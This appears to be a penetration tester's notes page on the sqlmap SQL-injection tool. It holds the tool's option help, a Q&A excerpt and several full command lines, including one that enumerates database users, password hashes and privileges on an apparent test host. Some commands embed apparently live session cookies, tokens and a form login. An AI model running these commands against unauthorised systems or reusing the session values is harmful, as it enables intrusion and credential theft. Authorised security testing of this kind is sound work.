https://github.com/sqlmapproject/sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
http://sqlmap.org/
测试用例
http://localhost:8086/project/controller/action (POST) # C:\Users\clu\Downloads\sqlmapproject-sqlmap-d4d83b2\sqlmap.py -u http://localhost:8086/project/controller/action --data=search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30
search=chuck&periodStatus=0&__RequestVerificationToken=AtQOR018kN6-nWlDQxFKI-9_-4Ni7JnZaNKTPMlbZFIzuK1Lz889_M0Wf5sYQ-H14fWTfUI0jJYFTYL30
%userprofile%\AppData\Local\sqlmap\output\localhost
.\sqlmap.py -u "https://host:port/pentest5/Campaign/GetMyCampaignList" --data="search=cam&periodStatus=0&__RequestVerificationToken=Hgf410s-TtjOD2MoQFIQ7ebBFik__POnfJ3kbJjQ8CLK1XyS-d3GyY6gd_UHCkQs0cSTKfVks77VnBz00" --cookie="WebSession=4bpzpunlduq5z0cpzf5ysmnr; __RequestVerificationToken=h5owU63jNKlDzObOGxW4h7caJMJfDsBnxcN2U9Vj_iHQku9mkd-OY4GSgjG_YGzfnWLMYg2; _ga=GA1.2.2054830099.1592468707; _gid=GA1.2.1238954720.1592468707; EdenredAdminSite=D9DB90E84FE929C84DB3C85E98AE621C5866E18BC145A78037513899550B3CA1039C2E89B3B8FED91E2EBFD0FB210E156C14C94C1E03112CCA2A81F5923D7421A7DF72E09A6551AA3485B380362E69ABA5B025EEA6AB8AFA712D19859EF6C2654C61C14F17A09F87F330BAC4D0440C87E74E778EF6E3D6D00E54CCE964C8B83995287D2CBA4576422C7FAD7B2C3D61A2CE47064FFCE860C8C589EA9E3F3994FDDB9F49C889E9A4380A57C6C2022503A54F15A98705F1F0A9DDC51795CDF614558C9C9D7D29085F27143F78D3EB8F3BC220DBA41BC257BFC941413B16DBA2A015318417A4F9261C105DE0703176DB969D48D89FC3C945258E415AAD9CB927EFB43B88F37DF0ACA143423F0B22CB6804E5931466F243A939474B3EA80AE7EF32959106A5B062C62C5FB26E63F8; EdenredParticipantSite=711332B299FB9664209A49D30D437D637D5A4E181980464C896E36530CE845C19F8E3CACAD91DCC386385050164D33AD9E74F6195D91A210291F260AC5371BD831B6094C7B5723858FB8FE4654DB793C25835355593FDE328D4F6E35192FE58742E85A29B669175C8B7FC4DB1252E75FD43EA254EBBA26CEACC1EFAB8CBCC18E83CB48B80FDE3B22DA3D3B369E49F6C5BBF2D8D36CDA2D9A1258CF6DB6C43049883F88992C07EF2B51D56E95E670FB878FE8F77DAF0E21BD45B668D28563A1669234602C188290EF6187D3AC99BFCA92ADFDCE86226F4443D7DDEFA1C46B4D4373DA392837D7CE27C630008303D1E50665E689B8C4D2DE4402D051C7CB5A06320185FAF86A85AAB05B1BA1EDCBEAF45D7974610C3D3E9DC388C600238B56E2324AC274C9E315F3004CA2C08F3CEA38538FE34435" --delay=0 --timeout=30 -retries=0 -p "search, periodStatus" --dbms="Microsoft SQL Server" --os=Windows --level=3 --risk=1 --threads=4 --time-sec=5 -b --current-user --current-db --hostname --is-dba --users --passwords --privileges --roles --dbs --batch --answers="crack=N,dict=N"
参数说明
https://github.com/sqlmapproject/sqlmap/wiki/Usage
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
-os=OS Force back-end DBMS operating system to provided value
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--answers=ANSWERS Set predefined answers (e.g. "quit=N,follow=N")
python.exe .\sqlmap.py -u "url" -f --banner --dbs --users
you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
You can just comma-separate the parameters you want to test.
In a GET request:
$ sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"
In a POST request:
$ sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST
...
[13:37:54] [WARNING] heuristic (basic) test shows that POST parameter 'a' might not be injectable
...
[13:37:59] [WARNING] heuristic (basic) test shows that POST parameter 'b' might not be injectable
...
Both examples would test the specified parameters a and b, but ignore c. (I also put them into double quotes which isn't actually necessary on Linux.)
例子
python sqlmap.py --url="http://172.16.192.177" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4MjI5ODQ3ODhkZBhYr%2F8jkYBFxsKYA1YM1vPkqv5P%2FQj8KLA89PfymMCs&__EVENTVALIDATION=%2FwEdAARI43w1YsdHPRRITZvRBlVuY3plgk0YBAefRz3MyBlTcInkg%2Fut7Je4AtoEsfzZAOI85pbWlDO2hADfoPXD%2F5tdeqsY63Vwtk2NY2Vz7Ib0nYv%2BCWGPoIG6fglzvAXHKcM%3D&txtUserName=adinanta&txtPWD=p%40ssw0rd&btnSubmit=Submit" -p txtUserName --banner
python.exe .\sqlmap.py -u "url" --data="__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNTAyMzk4NTIwZGQ+200GJqzXan3bvSRe1830yMwO1/5WyLofSgkPPFPCDA==&__VIEWSTATEGENERATOR=AD8ECECA&__EVENTVALIDATION=/wEdAAMGQ3/2wHYEvc5SFKrtaUE7ESCFkFW/RuhzY1oLb/NUVM34O/GfAV4V4n0wgFZHr3cCneHHZYQNY/p/VeBR9o5AA9gjGBpbgF+4fPumKT6flA==&TextBox1=30&Button1=查询" --random-agent
[14:20:02] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n]
